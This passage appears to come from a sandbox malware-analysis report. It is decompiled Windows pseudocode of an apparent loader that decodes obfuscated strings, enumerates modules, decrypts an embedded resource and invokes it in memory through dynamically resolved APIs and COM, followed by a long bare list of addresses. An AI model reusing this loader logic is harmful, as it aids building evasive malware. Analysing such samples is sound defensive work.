					 *((char*)(_t557 + 0x6a)) = 0x22;
					 *((char*)(_t557 + 0x6b)) = 0x57;
					 *((char*)(_t557 + 0x6c)) = 0x91;
					 *((char*)(_t557 + 0x6d)) = 0x21;
					 *((char*)(_t557 + 0x6e)) = 0x57;
					 *((char*)(_t557 + 0x6f)) = 0x3a;
					 *((char*)(_t557 + 0x70)) = 0xf8;
					 *((char*)(_t557 + 0x71)) = 0x98;
					 *((char*)(_t557 + 0x72)) = 0x5b;
					 *((char*)(_t557 + 0x73)) = 0xf4;
					 *((char*)(_t557 + 0x74)) = 0xb5;
					 *((char*)(_t557 + 0x75)) = 0x87;
					 *((char*)(_t557 + 0x76)) = 0x7b;
					 *((char*)(_t557 + 0x77)) = 0xf;
					 *((char*)(_t557 + 0x78)) = 0xf4;
					 *((char*)(_t557 + 0x79)) = 0x76;
					 *((char*)(_t557 + 0x7a)) = 0xb9;
					 *((char*)(_t557 + 0x7b)) = 0x34;
					 *((char*)(_t557 + 0x7c)) = 0xbf;
					 *((char*)(_t557 + 0x7d)) = 0x1e;
					 *((char*)(_t557 + 0x7e)) = 0xe7;
					 *((char*)(_t557 + 0x7f)) = 0x78;
					 *((char*)(_t557 + 0x80)) = 0x98;
					 *((char*)(_t557 + 0x81)) = 0xe9;
					 *((char*)(_t557 + 0x82)) = 0x6f;
					 *((char*)(_t557 + 0x83)) = 0xb4;
					 *((char*)(_t557 + 0x84)) = 0;
					 *((char*)(_t557 + 0x18)) = 0xc0;
					 *((char*)(_t557 + 0x19)) = 0x38;
					 *((char*)(_t557 + 0x1a)) = 0x8d;
					 *((char*)(_t557 + 0x1b)) = 0x1f;
					 *((char*)(_t557 + 0x1c)) = 0x8e;
					 *((char*)(_t557 + 0x1d)) = 0x30;
					 *((char*)(_t557 + 0x1e)) = 0x65;
					 *((char*)(_t557 + 0x1f)) = 0x47;
					 *((char*)(_t557 + 0x20)) = 0xd3;
					 *((char*)(_t557 + 0x21)) = 0x29;
					 *((char*)(_t557 + 0x22)) = 0x3b;
					 *((char*)(_t557 + 0x23)) = 0x56;
					 *((char*)(_t557 + 0x24)) = 0xf8;
					 *((char*)(_t557 + 0x25)) = 0x98;
					 *((char*)(_t557 + 0x26)) = 0x5b;
					 *((char*)(_t557 + 0x27)) = 0xf4;
					 *((char*)(_t557 + 0x28)) = 0xb5;
					 *((char*)(_t557 + 0x29)) = 0x87;
					 *((char*)(_t557 + 0x2a)) = 0x7b;
					 *((char*)(_t557 + 0x2b)) = 0xf;
					 *((char*)(_t557 + 0x2c)) = 0xf4;
					 *((char*)(_t557 + 0x2d)) = 0x76;
					 *((char*)(_t557 + 0x2e)) = 0xb9;
					 *((char*)(_t557 + 0x2f)) = 0x34;
					 *((char*)(_t557 + 0x30)) = 0xbf;
					 *((char*)(_t557 + 0x31)) = 0x1e;
					 *((char*)(_t557 + 0x32)) = 0xe7;
					 *((char*)(_t557 + 0x33)) = 0x78;
					 *((char*)(_t557 + 0x34)) = 0x98;
					 *((char*)(_t557 + 0x35)) = 0xe9;
					 *((char*)(_t557 + 0x36)) = 0x6f;
					 *((char*)(_t557 + 0x37)) = 0xb4;
					 *((char*)(_t557 + 0x38)) = 0;
					_t341 = Module32First(_t525, _t557 + 0x278); // executed
					if(_t341 == 0) {
						L38:
						FindCloseChangeNotification(_t525); // executed
						_t526 = GetModuleHandleA(0);
						 *((char*)(_t557 + 0x1c)) = 0xfc;
						 *((char*)(_t557 + 0x1d)) = 0xb;
						 *((char*)(_t557 + 0x1e)) = 0xff;
						 *((char*)(_t557 + 0x1f)) = 0x75;
						 *((char*)(_t557 + 0x20)) = 0xe7;
						 *((char*)(_t557 + 0x21)) = 0x44;
						 *((char*)(_t557 + 0x22)) = 0x4b;
						 *((char*)(_t557 + 0x23)) = 0x23;
						 *((char*)(_t557 + 0x24)) = 0xbf;
						 *((char*)(_t557 + 0x25)) = 0x45;
						 *((char*)(_t557 + 0x26)) = 0x3b;
						 *((char*)(_t557 + 0x27)) = 0x56;
						 *((char*)(_t557 + 0x28)) = 0xf8;
						 *((char*)(_t557 + 0x29)) = 0x98;
						 *((char*)(_t557 + 0x2a)) = 0x5b;
						 *((char*)(_t557 + 0x2b)) = 0xf4;
						 *((char*)(_t557 + 0x2c)) = 0xb5;
						 *((char*)(_t557 + 0x2d)) = 0x87;
						 *((char*)(_t557 + 0x2e)) = 0x7b;
						 *((char*)(_t557 + 0x2f)) = 0xf;
						 *((char*)(_t557 + 0x30)) = 0xf4;
						 *((char*)(_t557 + 0x31)) = 0x76;
						 *((char*)(_t557 + 0x32)) = 0xb9;
						 *((char*)(_t557 + 0x33)) = 0x34;
						 *((char*)(_t557 + 0x34)) = 0xbf;
						 *((char*)(_t557 + 0x35)) = 0x1e;
						 *((char*)(_t557 + 0x36)) = 0xe7;
						 *((char*)(_t557 + 0x37)) = 0x78;
						 *((char*)(_t557 + 0x38)) = 0x98;
						 *((char*)(_t557 + 0x39)) = 0xe9;
						 *((char*)(_t557 + 0x3a)) = 0x6f;
						 *((char*)(_t557 + 0x3b)) = 0xb4;
						 *((char*)(_t557 + 0x3c)) = 0;
						_t344 = E00401650(_t557 + 0x18, _t557 + 0x158);
						_t558 = _t557 + 8;
						_t536 = FindResourceA(_t526, _t344, 0xa);
						 *(_t558 + 0x50) = _t536;
						_t551 = LoadResource(_t526, _t536);
						 *((intOrPtr*)(_t558 + 0x44)) = LockResource(_t551);
						_t349 = E0040B84D(0, _t557 + 0x18, _t526, SizeofResource(_t526, _t536)); // executed
						_push(0x40022);
						_t537 = _t349; // executed
						_t350 = E0040AF66(0, _t526, __eflags); // executed
						_t559 = _t558 + 8;
						 *(_t559 + 0x34) = _t350;
						__eflags = _t350;
						if(_t350 == 0) {
							 *(_t559 + 0x50) = 0;
						} else {
							E0040BA30(_t526, _t350, 0, 0x40022);
							_t486 =  *(_t559 + 0x40);
							_t559 = _t559 + 0xc;
							 *(_t559 + 0x50) = _t486;
						}
						E00401300( *(_t559 + 0x50));
						_t497 =  *(_t559 + 0x48);
						_t352 = SizeofResource(_t526, _t497);
						 *(_t559 + 0x40) = _t352;
						asm("cdq");
						_t354 = _t352 + (_t497 & 0x000003ff) >> 0xa;
						__eflags = _t354;
						if(_t354 > 0) {
							_t519 =  *(_t559 + 0x3c);
							_t482 = _t537 - _t519;
							__eflags = _t482;
							 *(_t559 + 0x34) = _t519;
							 *(_t559 + 0x88) = _t482;
							 *(_t559 + 0x38) = _t354;
							do {
								_t424 =  *(_t559 + 0x34);
								_push( *(_t559 + 0x88) + _t424);
								_push(0x400);
								_push(_t424);
								E00401560(0,  *((intOrPtr*)(_t559 + 0x54)));
								 *(_t559 + 0x34) =  *(_t559 + 0x34) + 0x400;
								_t179 = _t559 + 0x38;
								 *_t179 =  *(_t559 + 0x38) - 1;
								__eflags =  *_t179;
							} while ( *_t179 != 0);
						}
						_t448 =  *(_t559 + 0x40) & 0x800003ff;
						__eflags = _t448;
						if(_t448 < 0) {
							_t448 = (_t448 - 0x00000001 | 0xfffffc00) + 1;
							__eflags = _t448;
						}
						__eflags = _t448;
						if(_t448 > 0) {
							_t421 =  *(_t559 + 0x40) - _t448;
							_push(_t421 + _t537);
							_push(_t448);
							_t422 = _t421 +  *((intOrPtr*)(_t559 + 0x44));
							__eflags = _t422;
							_push(_t422);
							E00401560(0,  *((intOrPtr*)(_t559 + 0x58)));
						}
						E0040BA30(_t526,  *(_t559 + 0x3c), 0,  *(_t559 + 0x40));
						_t560 = _t559 + 0xc;
						FreeResource(_t551);
						_t552 =  *_t537;
						 *((intOrPtr*)(_t560 + 0x94)) = _t552;
						_t358 = E0040B84D(0,  *(_t559 + 0x40), _t526, _t552); // executed
						_t561 = _t560 + 4;
						 *((intOrPtr*)(_t561 + 0x40)) = _t358;
						_t359 = SizeofResource(_t526,  *(_t560 + 0x4c));
						_t527 =  *((intOrPtr*)(_t561 + 0x38));
						_t192 = _t537 + 4; // 0x4
						E0040AC60(_t527, _t561 + 0x98, _t192, _t359);
						E0040BA30(_t527, _t537, 0,  *((intOrPtr*)(_t561 + 0x50)));
						_t528 = _t527 + 0xe;
						 *((char*)(_t561 + 0x34)) = 0xce;
						 *((char*)(_t561 + 0x35)) = 0x27;
						 *((char*)(_t561 + 0x36)) = 0x9c;
						 *((char*)(_t561 + 0x37)) = 0x1a;
						 *((char*)(_t561 + 0x38)) = 0x95;
						 *((char*)(_t561 + 0x39)) = 0x21;
						 *((char*)(_t561 + 0x3a)) = 0x2e;
						 *((char*)(_t561 + 0x3b)) = 0xd;
						 *((char*)(_t561 + 0x3c)) = 0xdb;
						 *((char*)(_t561 + 0x3d)) = 0x29;
						 *((char*)(_t561 + 0x3e)) = 0x57;
						 *((char*)(_t561 + 0x3f)) = 0x56;
						 *((char*)(_t561 + 0x40)) = 0xf8;
						 *((char*)(_t561 + 0x41)) = 0x98;
						 *((char*)(_t561 + 0x42)) = 0x5b;
						 *((char*)(_t561 + 0x43)) = 0xf4;
						 *((char*)(_t561 + 0x44)) = 0xb5;
						 *((char*)(_t561 + 0x45)) = 0x87;
						 *((char*)(_t561 + 0x46)) = 0x7b;
						 *((char*)(_t561 + 0x47)) = 0xf;
						 *((char*)(_t561 + 0x48)) = 0xf4;
						 *((char*)(_t561 + 0x49)) = 0x76;
						 *((char*)(_t561 + 0x4a)) = 0xb9;
						 *((char*)(_t561 + 0x4b)) = 0x34;
						 *((char*)(_t561 + 0x4c)) = 0xbf;
						 *((char*)(_t561 + 0x4d)) = 0x1e;
						 *((char*)(_t561 + 0x4e)) = 0xe7;
						 *((char*)(_t561 + 0x4f)) = 0x78;
						 *((char*)(_t561 + 0x50)) = 0x98;
						 *((char*)(_t561 + 0x51)) = 0xe9;
						 *((char*)(_t561 + 0x52)) = 0x6f;
						 *((char*)(_t561 + 0x53)) = 0xb4;
						 *((char*)(_t561 + 0x54)) = 0;
						_t364 = E00401650(_t561 + 0x30, _t561 + 0x110);
						_t562 = _t561 + 0x24;
						_t365 = LoadLibraryA(_t364); // executed
						_t538 = _t365;
						 *((char*)(_t562 + 0x10)) = 0xe0;
						 *((char*)(_t562 + 0x11)) = 0x18;
						 *((char*)(_t562 + 0x12)) = 0xad;
						 *((char*)(_t562 + 0x13)) = 0x36;
						 *((char*)(_t562 + 0x14)) = 0x95;
						 *((char*)(_t562 + 0x15)) = 0x21;
						_t451 = _t562 + 0x134;
						 *((char*)(_t562 + 0x1e)) = 0x2a;
						 *((char*)(_t562 + 0x1f)) = 0x57;
						 *((char*)(_t562 + 0x20)) = 0xda;
						 *((char*)(_t562 + 0x21)) = 0xc;
						 *((char*)(_t562 + 0x22)) = 0x55;
						 *((char*)(_t562 + 0x23)) = 0x25;
						 *((char*)(_t562 + 0x24)) = 0x8c;
						 *((char*)(_t562 + 0x25)) = 0xf9;
						 *((char*)(_t562 + 0x26)) = 0x35;
						 *((char*)(_t562 + 0x27)) = 0x97;
						 *((char*)(_t562 + 0x28)) = 0xd0;
						 *((char*)(_t562 + 0x29)) = 0x87;
						 *((char*)(_t562 + 0x2a)) = 0x7b;
						 *((char*)(_t562 + 0x2b)) = 0xf;
						 *((char*)(_t562 + 0x2c)) = 0xf4;
						 *((char*)(_t562 + 0x2d)) = 0x76;
						 *((char*)(_t562 + 0x2e)) = 0xb9;
						 *((char*)(_t562 + 0x2f)) = 0x34;
						 *((char*)(_t562 + 0x30)) = 0xbf;
						 *((char*)(_t562 + 0x31)) = 0x1e;
						 *((char*)(_t562 + 0x32)) = 0xe7;
						 *((char*)(_t562 + 0x33)) = 0x78;
						 *((char*)(_t562 + 0x34)) = 0x98;
						 *((char*)(_t562 + 0x35)) = 0xe9;
						 *((char*)(_t562 + 0x36)) = 0x6f;
						 *((char*)(_t562 + 0x37)) = 0xb4;
						 *((char*)(_t562 + 0x38)) = 0;
						_t366 = E00401650(_t562 + 0x14, _t451);
						_t563 = _t562 + 8;
						_t367 = GetProcAddress(_t365, _t366);
						__eflags = _t367;
						_t452 = _t451 & 0xffffff00 | _t367 != 0x00000000;
						__eflags = _t452;
						 *(_t563 + 0x47) = _t452 == 0;
						 *0x423480 = _t367;
						 *((intOrPtr*)(_t563 + 0x80)) = 0;
						 *((intOrPtr*)(_t563 + 0x84)) = 0;
						 *((intOrPtr*)(_t563 + 0x4c)) = 0;
						 *(_t563 + 0x58) = 0;
						 *(_t563 + 0x54) = 0;
						__eflags = _t452;
						if(_t452 != 0) {
							_t368 =  *_t367(0x41b230, 0x41b220, _t563 + 0x80); // executed
							__eflags = _t368;
							if(_t368 >= 0) {
								__eflags =  *(_t563 + 0x47);
								if( *(_t563 + 0x47) == 0) {
									 *((intOrPtr*)(_t563 + 0x17c)) = _t563 + 0x17c;
									E004018F0( *((intOrPtr*)(_t563 + 0x38)), _t563 + 0x17c, _t563 + 0x17c,  *((intOrPtr*)(_t563 + 0x38)), 3);
									_t376 =  *((intOrPtr*)(_t563 + 0x80));
									_t378 =  *((intOrPtr*)( *((intOrPtr*)( *_t376 + 0xc))))(_t376,  *((intOrPtr*)(_t563 + 0x178)), 0x41b240, _t563 + 0x84); // executed
									__eflags = _t378;
									if(_t378 >= 0) {
										_t381 =  *((intOrPtr*)(_t563 + 0x84));
										_t383 =  *((intOrPtr*)( *((intOrPtr*)( *_t381 + 0x24))))(_t381, 0x41b210, 0x41b290, _t563 + 0x4c); // executed
										__eflags = _t383;
										if(_t383 >= 0) {
											_t384 =  *((intOrPtr*)(_t563 + 0x4c));
											_t385 =  *((intOrPtr*)( *((intOrPtr*)( *_t384 + 0x28))))(_t384); // executed
											__eflags = _t385;
											if(_t385 >= 0) {
												 *((intOrPtr*)(_t563 + 0x38)) = 0;
												E00401870(_t563 + 0x44, _t552, "_._");
												_t539 = __imp__#8;
												 *((intOrPtr*)(_t563 + 0x40)) = 0;
												 *_t539(_t563 + 0x94);
												E00401870(_t563 + 0x3c, _t552, "___");
												 *_t539(_t563 + 0xa4);
												 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t563 + 0x4c)))) + 0x34))))( *((intOrPtr*)(_t563 + 0x50)), E004018D0(_t563 + 0x58)); // executed
												_t542 =  *(_t563 + 0x58);
												__eflags = _t542;
												if(_t542 == 0) {
													E0040AD90(0x80004003);
												}
												_t396 =  *((intOrPtr*)( *((intOrPtr*)( *_t542))))(_t542, 0x41b270, E004018D0(_t563 + 0x54));
												 *((intOrPtr*)(_t563 + 0x94)) = _t552 + 0xfffffff2;
												 *((intOrPtr*)(_t563 + 0x98)) = 0;
												__imp__#15(0x11, 1, _t563 + 0x88); // executed
												_t543 = _t396;
												 *((intOrPtr*)(_t563 + 0x50)) = 0;
												__imp__#23(_t543, _t563 + 0x48);
												E0040B350(0, _t528, _t543,  *((intOrPtr*)(_t563 + 0x48)), _t528, _t552 + 0xfffffff2);
												_t564 = _t563 + 0xc;
												__imp__#24(_t543);
												_t399 =  *(_t564 + 0x54);
												__eflags = _t399;
												if(_t399 == 0) {
													_t399 = E0040AD90(0x80004003);
												}
												 *((intOrPtr*)( *((intOrPtr*)( *_t399 + 0xb4))))(_t399, _t543, E004018D0(_t564 + 0x34)); // executed
												__eflags = _t543;
												if(_t543 != 0) {
													__imp__#16(_t543); // executed
												}
												_t402 =  *(_t564 + 0x34);
												__eflags = _t402;
												if(_t402 == 0) {
													_t402 = E0040AD90(0x80004003);
												}
												_t469 =  *(_t564 + 0x40);
												_t555 = _t402;
												__eflags = _t469;
												if(_t469 == 0) {
													_t531 = 0;
													__eflags = 0;
												} else {
													_t531 =  *_t469;
												}
												 *((intOrPtr*)( *((intOrPtr*)( *_t402 + 0x44))))(_t555, _t531, E004018D0(_t564 + 0x3c)); // executed
												__imp__#411(0xc, 0, 0);
												_t471 =  *(_t564 + 0x3c);
												__eflags = _t471;
												if(_t471 == 0) {
													E0040AD90(0x80004003);
												}
												_t405 =  *(_t564 + 0x38);
												__eflags = _t405;
												if(_t405 == 0) {
													_t514 = 0;
													__eflags = 0;
												} else {
													_t514 =  *_t405;
												}
												_t563 = _t564 - 0x10;
												_t407 = _t563;
												 *_t407 =  *((intOrPtr*)(_t564 + 0x94));
												 *((intOrPtr*)(_t407 + 4)) =  *((intOrPtr*)(_t563 + 0xb0));
												 *((intOrPtr*)(_t407 + 8)) =  *((intOrPtr*)(_t563 + 0xb8));
												_t528 =  *((intOrPtr*)(_t563 + 0xc0));
												 *((intOrPtr*)(_t407 + 0xc)) =  *((intOrPtr*)(_t563 + 0xc0));
												 *((intOrPtr*)( *((intOrPtr*)( *_t471 + 0xe4))))(_t471, _t514, 0x118, 0, 0, _t564 + 0xa4);
												_t538 = __imp__#9; // 0x742dcf00
												_t538->i(_t563 + 0xa4);
												E004019A0(_t563 + 0x38);
												_t538->i(_t563 + 0x94);
												_t413 =  *(_t563 + 0x3c);
												__eflags = _t413;
												if(_t413 != 0) {
													 *((intOrPtr*)( *((intOrPtr*)( *_t413 + 8))))(_t413);
												}
												E004019A0(_t563 + 0x40);
												_t415 =  *(_t563 + 0x34);
												__eflags = _t415;
												if(_t415 != 0) {
													 *((intOrPtr*)( *((intOrPtr*)( *_t415 + 8))))(_t415);
												}
											}
										}
									}
									_t379 =  *((intOrPtr*)(_t563 + 0x174));
									__eflags = _t379 - _t563 + 0x178;
									if(__eflags != 0) {
										_push(_t379);
										E0040B6B5(0, _t528, _t538, __eflags);
										_t563 = _t563 + 4;
									}
								}
							}
							_t369 =  *(_t563 + 0x54);
							__eflags = _t369;
							if(_t369 != 0) {
								 *((intOrPtr*)( *((intOrPtr*)( *_t369 + 8))))(_t369);
							}
							_t370 =  *(_t563 + 0x58);
							__eflags = _t370;
							if(_t370 != 0) {
								 *((intOrPtr*)( *((intOrPtr*)( *_t370 + 8))))(_t370);
							}
						}
						goto L80;
					} else {
						_t428 = E00401650(_t557 + 0x60, _t557 + 0xd4);
						_t565 = _t557 + 8;
						_t547 = _t428;
						_t520 = _t565 + 0x298;
						while(1) {
							_t429 =  *_t520;
							if(_t429 !=  *_t547) {
								break;
							}
							if(_t429 == 0) {
								L7:
								_t429 = 0;
							} else {
								_t493 =  *((intOrPtr*)(_t520 + 1));
								if(_t493 !=  *((intOrPtr*)(_t547 + 1))) {
									break;
								} else {
									_t520 = _t520 + 2;
									_t547 = _t547 + 2;
									if(_t493 != 0) {
										continue;
									} else {
										goto L7;
									}
								}
							}
							L9:
							if(_t429 != 0) {
								_t431 = E00401650(_t565 + 0x14, _t565 + 0xb4);
								_t557 = _t565 + 8;
								_t548 = _t431;
								_t488 = _t557 + 0x298;
								while(1) {
									_t432 =  *_t488;
									__eflags = _t432 -  *_t548;
									if(_t432 !=  *_t548) {
										break;
									}
									__eflags = _t432;
									if(_t432 == 0) {
										L16:
										_t432 = 0;
									} else {
										_t432 =  *((intOrPtr*)(_t488 + 1));
										__eflags = _t432 -  *((intOrPtr*)(_t548 + 1));
										if(_t432 !=  *((intOrPtr*)(_t548 + 1))) {
											break;
										} else {
											_t488 = _t488 + 2;
											_t548 = _t548 + 2;
											__eflags = _t432;
											if(_t432 != 0) {
												continue;
											} else {
												goto L16;
											}
										}
									}
									L18:
									__eflags = _t432;
									if(_t432 == 0) {
										goto L10;
									} else {
										_t435 = Module32Next(_t525, _t557 + 0x278);
										__eflags = _t435;
										if(_t435 != 0) {
											do {
												_t437 = E00401650(_t557 + 0x60, _t557 + 0xd4);
												_t566 = _t557 + 8;
												_t549 = _t437;
												_t490 = _t566 + 0x298;
												while(1) {
													_t438 =  *_t490;
													__eflags = _t438 -  *_t549;
													if(_t438 !=  *_t549) {
														break;
													}
													__eflags = _t438;
													if(_t438 == 0) {
														L26:
														_t438 = 0;
													} else {
														_t438 =  *((intOrPtr*)(_t490 + 1));
														__eflags = _t438 -  *((intOrPtr*)(_t549 + 1));
														if(_t438 !=  *((intOrPtr*)(_t549 + 1))) {
															break;
														} else {
															_t490 = _t490 + 2;
															_t549 = _t549 + 2;
															__eflags = _t438;
															if(_t438 != 0) {
																continue;
															} else {
																goto L26;
															}
														}
													}
													L28:
													__eflags = _t438;
													if(_t438 == 0) {
														goto L10;
													} else {
														_t439 = E00401650(_t566 + 0x14, _t566 + 0xb4);
														_t557 = _t566 + 8;
														_t550 = _t439;
														_t492 = _t557 + 0x298;
														while(1) {
															_t440 =  *_t492;
															__eflags = _t440 -  *_t550;
															if(_t440 !=  *_t550) {
																break;
															}
															__eflags = _t440;
															if(_t440 == 0) {
																L34:
																_t440 = 0;
															} else {
																_t440 =  *((intOrPtr*)(_t492 + 1));
																__eflags = _t440 -  *((intOrPtr*)(_t550 + 1));
																if(_t440 !=  *((intOrPtr*)(_t550 + 1))) {
																	break;
																} else {
																	_t492 = _t492 + 2;
																	_t550 = _t550 + 2;
																	__eflags = _t440;
																	if(_t440 != 0) {
																		continue;
																	} else {
																		goto L34;
																	}
																}
															}
															L36:
															__eflags = _t440;
															if(_t440 == 0) {
																goto L10;
															} else {
																goto L37;
															}
															goto L81;
														}
														asm("sbb eax, eax");
														asm("sbb eax, 0xffffffff");
														goto L36;
													}
													goto L81;
												}
												asm("sbb eax, eax");
												asm("sbb eax, 0xffffffff");
												goto L28;
												L37:
												_t442 = Module32Next(_t525, _t557 + 0x278);
												__eflags = _t442;
											} while (_t442 != 0);
										}
										goto L38;
									}
									goto L81;
								}
								asm("sbb eax, eax");
								asm("sbb eax, 0xffffffff");
								goto L18;
							} else {
								L10:
								CloseHandle(_t525);
								return 0;
							}
							goto L81;
						}
						asm("sbb eax, eax");
						asm("sbb eax, 0xffffffff");
						goto L9;
					}
				}
				L81:
			}

































































































                                                                                                                                                                                                                                    0x004019f0
                                                                                                                                                                                                                                    0x004019f0
                                                                                                                                                                                                                                    0x004019fd
                                                                                                                                                                                                                                    0x00401a10
                                                                                                                                                                                                                                    0x00401a15
                                                                                                                                                                                                                                    0x00401a1a
                                                                                                                                                                                                                                    0x00401a1f
                                                                                                                                                                                                                                    0x00401a24
                                                                                                                                                                                                                                    0x00401a29
                                                                                                                                                                                                                                    0x00401a2e
                                                                                                                                                                                                                                    0x00401a33
                                                                                                                                                                                                                                    0x00401a38
                                                                                                                                                                                                                                    0x00401a3d
                                                                                                                                                                                                                                    0x00401a42
                                                                                                                                                                                                                                    0x00401a47
                                                                                                                                                                                                                                    0x00401a4c
                                                                                                                                                                                                                                    0x00401a51
                                                                                                                                                                                                                                    0x00401a56
                                                                                                                                                                                                                                    0x00401a5b
                                                                                                                                                                                                                                    0x00401a60
                                                                                                                                                                                                                                    0x00401a65
                                                                                                                                                                                                                                    0x00401a6a
                                                                                                                                                                                                                                    0x00401a6f
                                                                                                                                                                                                                                    0x00401a74
                                                                                                                                                                                                                                    0x00401a79
                                                                                                                                                                                                                                    0x00401a7e
                                                                                                                                                                                                                                    0x00401a83
                                                                                                                                                                                                                                    0x00401a88
                                                                                                                                                                                                                                    0x00401a8d
                                                                                                                                                                                                                                    0x00401a92
                                                                                                                                                                                                                                    0x00401a97
                                                                                                                                                                                                                                    0x00401a9c
                                                                                                                                                                                                                                    0x00401aa1
                                                                                                                                                                                                                                    0x00401aa6
                                                                                                                                                                                                                                    0x00401aab
                                                                                                                                                                                                                                    0x00401ab0
                                                                                                                                                                                                                                    0x00401ab9
                                                                                                                                                                                                                                    0x00401aba
                                                                                                                                                                                                                                    0x00401abf
                                                                                                                                                                                                                                    0x00401ac7
                                                                                                                                                                                                                                    0x0040248d
                                                                                                                                                                                                                                    0x0040248d
                                                                                                                                                                                                                                    0x00402496
                                                                                                                                                                                                                                    0x00401acd
                                                                                                                                                                                                                                    0x00401ad6
                                                                                                                                                                                                                                    0x00401ae2
                                                                                                                                                                                                                                    0x00401ae6
                                                                                                                                                                                                                                    0x00401af1
                                                                                                                                                                                                                                    0x00401af6
                                                                                                                                                                                                                                    0x00401afb
                                                                                                                                                                                                                                    0x00401b00
                                                                                                                                                                                                                                    0x00401b05
                                                                                                                                                                                                                                    0x00401b0a
                                                                                                                                                                                                                                    0x00401b0f
                                                                                                                                                                                                                                    0x00401b14
                                                                                                                                                                                                                                    0x00401b19
                                                                                                                                                                                                                                    0x00401b1e
                                                                                                                                                                                                                                    0x00401b23
                                                                                                                                                                                                                                    0x00401b28
                                                                                                                                                                                                                                    0x00401b2d
                                                                                                                                                                                                                                    0x00401b32
                                                                                                                                                                                                                                    0x00401b37
                                                                                                                                                                                                                                    0x00401b3c
                                                                                                                                                                                                                                    0x00401b41
                                                                                                                                                                                                                                    0x00401b46
                                                                                                                                                                                                                                    0x00401b4b
                                                                                                                                                                                                                                    0x00401b50
                                                                                                                                                                                                                                    0x00401b55
                                                                                                                                                                                                                                    0x00401b5a
                                                                                                                                                                                                                                    0x00401b5f
                                                                                                                                                                                                                                    0x00401b64
                                                                                                                                                                                                                                    0x00401b69
                                                                                                                                                                                                                                    0x00401b6e
                                                                                                                                                                                                                                    0x00401b73
                                                                                                                                                                                                                                    0x00401b78
                                                                                                                                                                                                                                    0x00401b7d
                                                                                                                                                                                                                                    0x00401b85
                                                                                                                                                                                                                                    0x00401b8d
                                                                                                                                                                                                                                    0x00401b95
                                                                                                                                                                                                                                    0x00401b9d
                                                                                                                                                                                                                                    0x00401ba4
                                                                                                                                                                                                                                    0x00401ba9
                                                                                                                                                                                                                                    0x00401bae
                                                                                                                                                                                                                                    0x00401bb3
                                                                                                                                                                                                                                    0x00401bb8
                                                                                                                                                                                                                                    0x00401bbd
                                                                                                                                                                                                                                    0x00401bc2
                                                                                                                                                                                                                                    0x00401bc7
                                                                                                                                                                                                                                    0x00401bcc
                                                                                                                                                                                                                                    0x00401bd1
                                                                                                                                                                                                                                    0x00401bd6
                                                                                                                                                                                                                                    0x00401bdb
                                                                                                                                                                                                                                    0x00401be0
                                                                                                                                                                                                                                    0x00401be5
                                                                                                                                                                                                                                    0x00401bea
                                                                                                                                                                                                                                    0x00401bef
                                                                                                                                                                                                                                    0x00401bf4
                                                                                                                                                                                                                                    0x00401bf9
                                                                                                                                                                                                                                    0x00401bfe
                                                                                                                                                                                                                                    0x00401c03
                                                                                                                                                                                                                                    0x00401c08
                                                                                                                                                                                                                                    0x00401c0d
                                                                                                                                                                                                                                    0x00401c12
                                                                                                                                                                                                                                    0x00401c17
                                                                                                                                                                                                                                    0x00401c1c
                                                                                                                                                                                                                                    0x00401c21
                                                                                                                                                                                                                                    0x00401c26
                                                                                                                                                                                                                                    0x00401c2b
                                                                                                                                                                                                                                    0x00401c30
                                                                                                                                                                                                                                    0x00401c35
                                                                                                                                                                                                                                    0x00401c3a
                                                                                                                                                                                                                                    0x00401c3f
                                                                                                                                                                                                                                    0x00401c44
                                                                                                                                                                                                                                    0x00401c48
                                                                                                                                                                                                                                    0x00401c4f
                                                                                                                                                                                                                                    0x00401dc3
                                                                                                                                                                                                                                    0x00401dc4
                                                                                                                                                                                                                                    0x00401de0
                                                                                                                                                                                                                                    0x00401de2
                                                                                                                                                                                                                                    0x00401de7
                                                                                                                                                                                                                                    0x00401dec
                                                                                                                                                                                                                                    0x00401df1
                                                                                                                                                                                                                                    0x00401df6
                                                                                                                                                                                                                                    0x00401dfb
                                                                                                                                                                                                                                    0x00401e00
                                                                                                                                                                                                                                    0x00401e05
                                                                                                                                                                                                                                    0x00401e0a
                                                                                                                                                                                                                                    0x00401e0f
                                                                                                                                                                                                                                    0x00401e14
                                                                                                                                                                                                                                    0x00401e19
                                                                                                                                                                                                                                    0x00401e1e
                                                                                                                                                                                                                                    0x00401e23
                                                                                                                                                                                                                                    0x00401e28
                                                                                                                                                                                                                                    0x00401e2d
                                                                                                                                                                                                                                    0x00401e32
                                                                                                                                                                                                                                    0x00401e37
                                                                                                                                                                                                                                    0x00401e3c
                                                                                                                                                                                                                                    0x00401e41
                                                                                                                                                                                                                                    0x00401e46
                                                                                                                                                                                                                                    0x00401e4b
                                                                                                                                                                                                                                    0x00401e50
                                                                                                                                                                                                                                    0x00401e55
                                                                                                                                                                                                                                    0x00401e5a
                                                                                                                                                                                                                                    0x00401e5f
                                                                                                                                                                                                                                    0x00401e64
                                                                                                                                                                                                                                    0x00401e69
                                                                                                                                                                                                                                    0x00401e6e
                                                                                                                                                                                                                                    0x00401e73
                                                                                                                                                                                                                                    0x00401e78
                                                                                                                                                                                                                                    0x00401e7d
                                                                                                                                                                                                                                    0x00401e82
                                                                                                                                                                                                                                    0x00401e86
                                                                                                                                                                                                                                    0x00401e8b
                                                                                                                                                                                                                                    0x00401e96
                                                                                                                                                                                                                                    0x00401e9a
                                                                                                                                                                                                                                    0x00401ea4
                                                                                                                                                                                                                                    0x00401eaf
                                                                                                                                                                                                                                    0x00401eba
                                                                                                                                                                                                                                    0x00401ebf
                                                                                                                                                                                                                                    0x00401ec4
                                                                                                                                                                                                                                    0x00401ec6
                                                                                                                                                                                                                                    0x00401ecb
                                                                                                                                                                                                                                    0x00401ece
                                                                                                                                                                                                                                    0x00401ed2
                                                                                                                                                                                                                                    0x00401ed4
                                                                                                                                                                                                                                    0x00401eef
                                                                                                                                                                                                                                    0x00401ed6
                                                                                                                                                                                                                                    0x00401edd
                                                                                                                                                                                                                                    0x00401ee2
                                                                                                                                                                                                                                    0x00401ee6
                                                                                                                                                                                                                                    0x00401ee9
                                                                                                                                                                                                                                    0x00401ee9
                                                                                                                                                                                                                                    0x00401ef7
                                                                                                                                                                                                                                    0x00401efc
                                                                                                                                                                                                                                    0x00401f02
                                                                                                                                                                                                                                    0x00401f08
                                                                                                                                                                                                                                    0x00401f0c
                                                                                                                                                                                                                                    0x00401f15
                                                                                                                                                                                                                                    0x00401f18
                                                                                                                                                                                                                                    0x00401f1a
                                                                                                                                                                                                                                    0x00401f1c
                                                                                                                                                                                                                                    0x00401f22
